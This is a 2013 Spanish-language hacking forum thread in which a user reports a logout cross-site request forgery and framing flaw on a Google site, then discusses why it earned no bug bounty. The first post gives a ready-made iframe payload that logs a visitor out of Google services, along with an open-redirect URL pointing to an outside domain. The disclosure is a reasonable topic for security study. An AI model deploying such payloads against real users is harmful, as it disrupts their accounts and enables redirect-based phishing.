Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Dedalo en Agosto 19, 2013, 08:38:11 PM

Título: XSRF + Cross Site Framing en Google
Publicado por: Dedalo en Agosto 19, 2013, 08:38:11 PM
He estado en estos días con un poco de tiempo libre así que me puse a buscar vulnerabilidades en google solo por diversión ya que es un target dificil, curiosamente encontré una vulnerabilidad, un link que si le mandas, lo deslogueas de su cuenta, se que muchos dirán click derecho al boton de desloguear copiar enlace y mandar eso, pero no, yo encontré una vulnerabilidad, una url de deslogueo es iframeable por lo que es vulnerable a ClickJacking y todos los ataques basados en FRAME por eso lo generalizo con Cross Site Framing... Sin mas que decir... un videito de la vuln.



Espero les guste, no hubo ni recompensa ni HoF pero me divertí mucho y eso cuenta...

Exploit:

   <iframe src="http://www.google-melange.com/_ah/logout?continue=https://www.google.com/accounts/Logout%3Fcontinue%3Dhttps://appengine.google.com/_ah/logout%253Fcontinue%253Dhttp://www.google-melange.com/gsoc/document/show/gsoc_program/google/gsoc2013/about_page%26service%3Dah" ></iframe>
   
Además una redirección:

http://www.google-melange.com/_ah/logout?continue=https://www.google.com/accounts/Logout%3Fcontinue%3Dhttps://appengine.google.com/_ah/logout%253Fcontinue%253Dhttp://seguridadblanca.in

Fuente: http://dedalo.seguridadblanca.in/2013/08/google-xsrf-cross-site-framing-no-vrp_19.html

Saludos,
Dedalo.
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: ANTRAX en Agosto 19, 2013, 08:40:16 PM
Muy buen post Dedalo!!
Te daran recompensa?
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: Dedalo en Agosto 19, 2013, 08:42:33 PM
No, para ellos no califica, a mi me parece que debieron aun que sea haberme dado mención honorable pero si para ellos no es, ya yo no puedo hacer nada igual el equipo de google contestó de manera rápida y me divertí.
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: ANTRAX en Agosto 19, 2013, 08:44:18 PM
A mi me pasó lo mismo con el XSS de Blogger... Decian que no calificaba como un bug critico y que por eso no me darian nada jajaja
Pero en donde hay un bug, hay dos o no? jajaja
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: Fabián Cuchietti en Agosto 21, 2013, 04:48:34 PM
El dominio esta protegido por sandbox, y es obvio que no daran una recompensa o mencionarlo en el "Hall of Fame" :).



Saludos.
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: Dedalo en Agosto 23, 2013, 04:43:56 PM
No hubo recompensa porque es XSRF de log-out no es dominio de sanbox... googleusercontent es el de sandbox


Saludos,
Dedalo.
Título: Re:XSRF + Cross Site Framing en Google
Publicado por: Fabián Cuchietti en Agosto 24, 2013, 11:16:05 AM
No solo es "googleusercontent.com" también hay muchos sandbox (googlegroup.com, googlecode.com, etc.)
Sólo texto | Texto con Imágenes